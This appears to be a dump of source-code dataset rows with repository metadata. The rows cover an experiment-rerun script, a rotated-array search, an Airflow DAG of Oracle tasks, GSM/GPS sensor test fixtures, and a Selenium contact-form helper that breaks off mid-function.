'seed': 5, 'method': 'random'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 6, 'method': 'random'},
{'bodies': [600, 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, 612, 613, 614, 615],
'seed': 4, 'method': 'align'},
{'bodies': [600, 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, 612, 613, 614, 615],
'seed': 6, 'method': 'align'}]
print("\n"*2)
for r in need_rerun:
cmd = f"sbatch -J exp_010_rerun submit.sh python 1.train.py --seed={r['seed']} --train_bodies={','.join([str(x) for x in r['bodies']])} --test_bodies={','.join([str(x) for x in r['bodies']])}"
if r["method"]=='random':
cmd += " --random_align_obs"
print(cmd)
print("\n"*2)
---- dataset row: module_5/rotated_array.py | repo: Sukhrobjon/career-lab | license: MIT ----
def find_pivot_index(nums):
"""
Suppose a sorted array A is rotated at some pivot unknown to you
beforehand. (i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).
Find the minimum element. NOTE: The array will not contain duplicates.
"""
min_num = nums[0]
pivot_index = 0
left = 0
right = len(nums) - 1
if left == right:
return pivot_index, nums[pivot_index]
while left <= right:
mid = (left + right) // 2
print(nums[mid])
if min_num > nums[mid]:
min_num = nums[mid]
pivot_index = mid
right = mid - 1
else:
left = mid + 1
return pivot_index, min_num
def find_pivot_index_in_duplicates(nums):
    """
    Suppose a sorted array A is rotated at some pivot unknown to you
    beforehand. (i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).
    Find the minimum element. NOTE: The array will contain duplicates.
    """
    # With duplicates, tracking a running minimum against nums[mid] can miss
    # the pivot (e.g. [2, 2, 2, 0, 2, 2]); the standard fix is to compare
    # nums[mid] with nums[right] and shrink right by one on ties.
    left = 0
    right = len(nums) - 1
    while left < right:
        mid = (left + right) // 2
        if nums[mid] > nums[right]:
            # Minimum must lie to the right of mid
            left = mid + 1
        elif nums[mid] < nums[right]:
            # Minimum is at mid or to its left
            right = mid
        else:
            # nums[mid] == nums[right]: cannot tell which side, discard right
            right -= 1
    return left, nums[left]
# nums = [4, 5, 6, 7, 0, 1, 2]
nums = [10, 10, 10, 10, 1]
single = [5, 5, 5, 5, 3]
result = find_pivot_index_in_duplicates(nums)
print(result)
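# Quick check of the duplicate-handling search on a case where equal elements
# hide the minimum from a naive midpoint comparison (values are illustrative):
tricky = [2, 2, 2, 0, 2, 2]
print(find_pivot_index_in_duplicates(tricky))  # expected: (3, 0)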
---- dataset row: etl_base/dags/sqlg_jobs_HRM.py | repo: buckylee2019/sqlg-airflow | license: Apache-2.0 | stars: 1 (2022-03-10) ----
# -*- coding: utf-8 -*-
# Author : Jesse Wei
# LastUpdate : 2020/10/04
# Impact : Jobs generated by SQLG
# Message : Humanity towards others, we live by sharing. Fear can hold you prisoner, only hope can set you free.
# from __future__ import print_function
import logging
import airflow
from datetime import datetime, timedelta
from airflow.operators.sensors import ExternalTaskSensor
from airflow.operators.python_operator import PythonOperator
from airflow.operators.bash_operator import BashOperator
from airflow.contrib.sensors.file_sensor import FileSensor
from airflow import models
from airflow.models import Variable
from acme.operators.sqlg_oracle import OracleOperatorWithTemplatedParams
from airflow.operators.oracle_operator import OracleOperator
# DB_NAME = 'DWH'
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEGREEMSF"
HR_DEGREEMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
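# The task blocks in this generated DAG all share one template. A hypothetical
# factory (illustration only, not part of the SQLG output) could produce them:
def make_sqlext_task(task_name):
    """Build the templated Oracle task used throughout this DAG (sketch)."""
    return OracleOperatorWithTemplatedParams(
        task_id=task_name,
        parameters=({":END_DT_CHAR": "{{ ds_nodash }}"}),
        sql="Begin SQLEXT." + task_name + "_SP(" + ":END_DT_CHAR" + "); End;")
# e.g. HR_ETSMSF = make_sqlext_task("HR_ETSMSF")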
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_ETSMSF"
HR_ETSMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_JOBRANK"
HR_JOBRANK = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_PEOMSF"
HR_PEOMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_PLACEMSF"
HR_PLACEMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_TYPMSF"
HR_TYPMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF"
MV_HR_EMPMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF_H"
MV_HR_EMPMSF_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF_CN"
MV_HR_EMPMSF_CN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF_CN_H"
MV_HR_EMPMSF_CN_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF_VN"
MV_HR_EMPMSF_VN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF_VN_H"
MV_HR_EMPMSF_VN_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF"
HR_DEPMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF_H"
HR_DEPMSF_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF_CN"
HR_DEPMSF_CN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF_CN_H"
HR_DEPMSF_CN_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF_VN"
HR_DEPMSF_VN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF_VN_H"
HR_DEPMSF_VN_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "PEOMSF2"
PEOMSF2 = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_BTYPMSF"
HR_BTYPMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_XXCONTRACT_NQJ"
HR_XXCONTRACT_NQJ = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_LOA_HISTORY"
HR_LOA_HISTORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_LOA_RETURN"
HR_LOA_RETURN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PERSONNEL_CATEGORY"
SDM_PERSONNEL_CATEGORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_SENIORITY_AT_WNC"
SDM_SENIORITY_AT_WNC = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_JOB_GRADE"
SDM_JOB_GRADE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_JOB_FAMILY"
SDM_JOB_FAMILY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_JOB_CATEGORY"
SDM_JOB_CATEGORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_WORK_PLACE"
SDM_WORK_PLACE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_CAUSE_OF_RESIGNING"
SDM_CAUSE_OF_RESIGNING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EDUCATION"
SDM_EDUCATION = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EMPLOYMENT_TYPE"
SDM_EMPLOYMENT_TYPE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_STAFF_STATUS"
SDM_STAFF_STATUS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_DEPARTMENT"
SDM_DEPARTMENT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_DEPARTMENT_H"
SDM_DEPARTMENT_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EMPLOYEE"
SDM_EMPLOYEE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EMPLOYEE_H"
SDM_EMPLOYEE_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_HEADCOUNT_BUDGET"
SDM_HEADCOUNT_BUDGET = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_NEWCOMERS"
SDM_NEWCOMERS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_HEADCOUNT"
FCT_HEADCOUNT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
",MN_BEG_DT"+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_HEADCOUNT_FULFILL_RATE"
FCT_HEADCOUNT_FULFILL_RATE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
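# Every block above instantiates the same operator with only the task id varying.
# A minimal loop-based sketch of the same pattern (assumption: the module-level
# names exist only for readability, so a dict of operators is equivalent):
ods_main_task_ids = ["HR_PEOMSF", "HR_PLACEMSF", "SDM_EMPLOYEE"]  # ...and the rest
ods_main_tasks = {}
for my_taskid in ods_main_task_ids:
    ods_main_tasks[my_taskid] = OracleOperatorWithTemplatedParams(
        task_id=my_taskid,
        parameters={":END_DT_CHAR": "{{ ds_nodash }}"},
        sql="Begin SQLEXT." + my_taskid + "_SP(:END_DT_CHAR); End;",
    )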
| 27.791284
| 118
| 0.633408
| 1,453
| 12,117
| 4.854783
| 0.087405
| 0.139495
| 0.104621
| 0.081372
| 0.813864
| 0.810746
| 0.810746
| 0.807343
| 0.807343
| 0.807343
| 0
| 0.001145
| 0.206982
| 12,117
| 435
| 119
| 27.855172
| 0.732855
| 0.084344
| 0
| 0.602941
| 1
| 0
| 0.287305
| 0.006338
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.032353
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3730609d0587a60db464887b9e2ef29dc7a1a964
| 8,423
|
py
|
Python
|
sitch/tests/christmas_tree/device_samples.py
|
codecuisine/sensor
|
06fb0908178af1ab673b95e7f435b873cc62e61b
|
[
"ECL-2.0",
"Apache-2.0",
"BSD-2-Clause"
] | 68
|
2016-08-08T17:28:59.000Z
|
2021-11-26T09:31:52.000Z
|
sitch/tests/christmas_tree/device_samples.py
|
codecuisine/sensor
|
06fb0908178af1ab673b95e7f435b873cc62e61b
|
[
"ECL-2.0",
"Apache-2.0",
"BSD-2-Clause"
] | 61
|
2016-08-20T21:01:01.000Z
|
2020-07-22T06:10:45.000Z
|
sitch/tests/christmas_tree/device_samples.py
|
codecuisine/sensor
|
06fb0908178af1ab673b95e7f435b873cc62e61b
|
[
"ECL-2.0",
"Apache-2.0",
"BSD-2-Clause"
] | 40
|
2017-01-28T23:06:22.000Z
|
2021-08-13T15:09:43.000Z
|
class DeviceSamples(object):
gps_device_loc_a = {"scan_program": "gpsd",
"event_type": "gps_scan",
"site_name": "test_site",
"sensor_id": "test_sensor_id",
"sensor_name": "test_sensor",
"type": "Feature",
"sat_time": "2017-03-25T00:30:48.000Z",
"time_drift": 2,
"sys_time": "2017-03-25T00:32:48.416592",
"event_timestamp": "2016-05-07 04:10:35",
"location": {
"type": "Point",
"coordinates": [-122.431297, 37.773972]}}
gps_device_loc_b = {"scan_program": "gpsd",
"event_type": "gps_scan",
"site_name": "test_site",
"sensor_id": "test_sensor_id",
"sensor_name": "test_sensor",
"type": "Feature",
"sat_time": "2017-03-25T00:30:48.000Z",
"time_drift": 2,
"sys_time": "2017-03-25T00:32:48.416592",
"event_timestamp": "2016-05-07 04:10:35",
"location": {
"type": "Point",
"coordinates": [-100.431297, 32.773972]}}
geoip_loc_a = {"scan_program": "geoip",
"event_type": "geoip_scan",
"event_timestamp": "2016-05-07 04:10:35",
"type": "Feature",
"location": {
"type": "Point",
"coordinates": [-122.431297, 37.773972]}}
geoip_loc_b = {"scan_program": "geoip",
"event_type": "geoip_scan",
"event_timestamp": "2016-05-07 04:10:35",
"type": "Feature",
"location": {
"type": "Point",
"coordinates": [-100.431297, 32.773972]}}
gsm_modem_1 = {"platform": "PLATFORM-NAME",
"event_type": "gsm_modem_scan",
"scan_results": [
{'bsic': '12', 'mcc': '310', 'rla': 0, 'lac': '178d',
                        'mnc': '411', 'txp': 5, 'rxl': 33, 'cell': 0,
                        'rxq': 0, 'ta': 255, 'cellid': '000f', 'arfcn': 154},
{'cell': 1, 'rxl': 20, 'lac': '178d', 'bsic': '30',
'mnc': '411', 'mcc': '310', 'cellid': '0010',
'arfcn': 128},
{'cell': 2, 'rxl': 10, 'lac': '178d', 'bsic': '00',
'mnc': '411', 'mcc': '310', 'cellid': '76e2',
'arfcn': 179},
{'cell': 3, 'rxl': 10, 'lac': '178d', 'bsic': '51',
'mnc': '411', 'mcc': '310', 'cellid': '1208',
'arfcn': 181},
                       {'cell': 4, 'rxl': 31, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 237},
{'cell': 5, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 238},
{'cell': 6, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 236}
],
"scan_start": "",
"scan_finish": "2016-05-07 02:36:50",
"event_timestamp": '2016-05-07 04:10:35',
"scan_program": "gsm_modem",
"site_name": "test_site",
"sensor_id": "test_sensor_id",
"sensor_name": "test_sensor",
"scanner_public_ip": "66.18.61.61",
"band": "GSM850_MODE"}
# This one triggers a no-neighbor alert
gsm_modem_2 = {"platform": "PLATFORM-NAME",
"event_type": "gsm_modem_scan",
"scan_results": [
{'bsic': '12', 'mcc': '310', 'rla': 0, 'lac': '178d',
                        'mnc': '411', 'txp': 5, 'rxl': 33, 'cell': 0,
                        'rxq': 0, 'ta': 255, 'cellid': '000f', 'arfcn': 154},
                       {'cell': 1, 'rxl': 31, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 237},
{'cell': 2, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 238},
{'cell': 3, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 181},
                       {'cell': 4, 'rxl': 31, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 237},
{'cell': 5, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 238},
{'cell': 6, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 236}
],
"scan_start": "",
"scan_finish": "2016-05-07 02:36:50",
"event_timestamp": '2016-05-07 04:10:35',
"scan_program": "gsm_modem",
"site_name": "test_site",
"sensor_id": "test_sensor_id",
"sensor_name": "test_sensor",
"scanner_public_ip": "66.18.61.61",
"band": "GSM850_MODE"}
kal_scan_1 = {'platform': 'PLATFORM-NAME',
'event_type': 'kalibrate_scan',
'scan_finish': '2016-05-07 04:14:30',
'site_name': 'SITE_NAME',
'scanner_public_ip': '0.0.0.0',
'sensor_name': 'SENSOR_NAME',
'sensor_id': 'SENSOR_ID',
'scan_results': [
{'channel_detect_threshold': '279392.605625',
'power': '5909624.47', 'final_freq': '869176168',
'mod_freq': 23832.0, 'band': 'GSM-850',
'sample_rate': '270833.002142', 'gain': '80.0',
'base_freq': 869200000.0, 'device':
'0: Generic RTL2832U OEM', 'modifier': '-',
'channel': '12'}, # This should not be in the feed DB
{'channel_detect_threshold': '279392.605625',
'power': '5909624.47', 'final_freq': '869176168',
'mod_freq': 23832.0, 'band': 'GSM-850',
'sample_rate': '270833.002142', 'gain': '80.0',
'base_freq': 869200000.0, 'device':
'0: Generic RTL2832U OEM', 'modifier': '-',
'channel': '128'},
{'channel_detect_threshold': '279392.605625',
'power': '400160.02', 'final_freq': '874376406',
'mod_freq': 23594.0, 'band': 'GSM-850',
'sample_rate': '270833.002142', 'gain': '80.0',
'base_freq': 874400000.0, 'device':
'0: Generic RTL2832U OEM', 'modifier': '-',
'channel': '154'},
{'channel_detect_threshold': '279392.605625',
'power': '401880.05', 'final_freq': '889829992',
'mod_freq': 29992.0, 'band': 'GSM-850',
'sample_rate': '270833.002142', 'gain': '80.0',
'base_freq': 889800000.0, 'device':
'0: Generic RTL2832U OEM', 'modifier': '+',
'channel': '231'},
{'channel_detect_threshold': '279392.605625',
'power': '397347.54', 'final_freq': '891996814',
'mod_freq': 3186.0, 'band': 'GSM-850',
'sample_rate': '270833.002142', 'gain': '80.0',
'base_freq': 892000000.0, 'device':
'0: Generic RTL2832U OEM', 'modifier': '-',
'channel': '242'}],
'scan_start': '2016-05-07 04:10:35',
'event_timestamp': '2016-05-07 04:10:35',
'scan_program': 'kalibrate'}
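# A minimal usage sketch (assumption: tests import this module as device_samples):
# from device_samples import DeviceSamples
# lon, lat = DeviceSamples.gps_device_loc_a["location"]["coordinates"]
# first_cell = DeviceSamples.gsm_modem_1["scan_results"][0]
# assert first_cell["cellid"] == "000f"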
| 54.694805
| 78
| 0.389054
| 777
| 8,423
| 4.043758
| 0.212355
| 0.021006
| 0.028008
| 0.028644
| 0.846913
| 0.813813
| 0.762253
| 0.762253
| 0.701464
| 0.701464
| 0
| 0.187797
| 0.425976
| 8,423
| 153
| 79
| 55.052288
| 0.462048
| 0.008429
| 0
| 0.684932
| 0
| 0
| 0.357648
| 0.02635
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2eace84ba4aec462e25df23624f099926a5c1100
| 3,368
|
py
|
Python
|
fixture/contact.py
|
AdKrajan/python_training
|
1315b58c07db4d02bc46ae65e5c358fdbf78dbc0
|
[
"Apache-2.0"
] | null | null | null |
fixture/contact.py
|
AdKrajan/python_training
|
1315b58c07db4d02bc46ae65e5c358fdbf78dbc0
|
[
"Apache-2.0"
] | null | null | null |
fixture/contact.py
|
AdKrajan/python_training
|
1315b58c07db4d02bc46ae65e5c358fdbf78dbc0
|
[
"Apache-2.0"
] | null | null | null |
class ContactHelper:
def __init__(self, app):
self.app = app
def open_add_contact_page(self):
        # open the page for creating a new contact
wd = self.app.wd
wd.find_element_by_link_text("add new").click()
def fill_form(self, contact):
        # fill in the contact form
wd = self.app.wd
self.open_add_contact_page()
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(contact.first_name)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(contact.last_name)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(contact.nick)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(contact.home_phone)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(contact.mobile_phone)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(contact.email)
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
self.back_to_contacts_list()
def modification_first_contact(self, contact):
wd = self.app.wd
self.select_first_contact(wd)
        # click the edit button of the first contact
wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[2]/td[8]/a/img").click()
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(contact.first_name)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(contact.last_name)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(contact.nick)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(contact.home_phone)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(contact.mobile_phone)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(contact.email)
wd.find_element_by_name("update").click()
self.back_to_contacts_list()
def delete_first_contact(self):
wd = self.app.wd
self.select_first_contact(wd)
        # click the delete button
        wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
        # accept the confirmation alert (legacy Selenium API; Selenium 4 uses wd.switch_to.alert)
        wd.switch_to_alert().accept()
self.back_to_contacts_list()
def select_first_contact(self, wd):
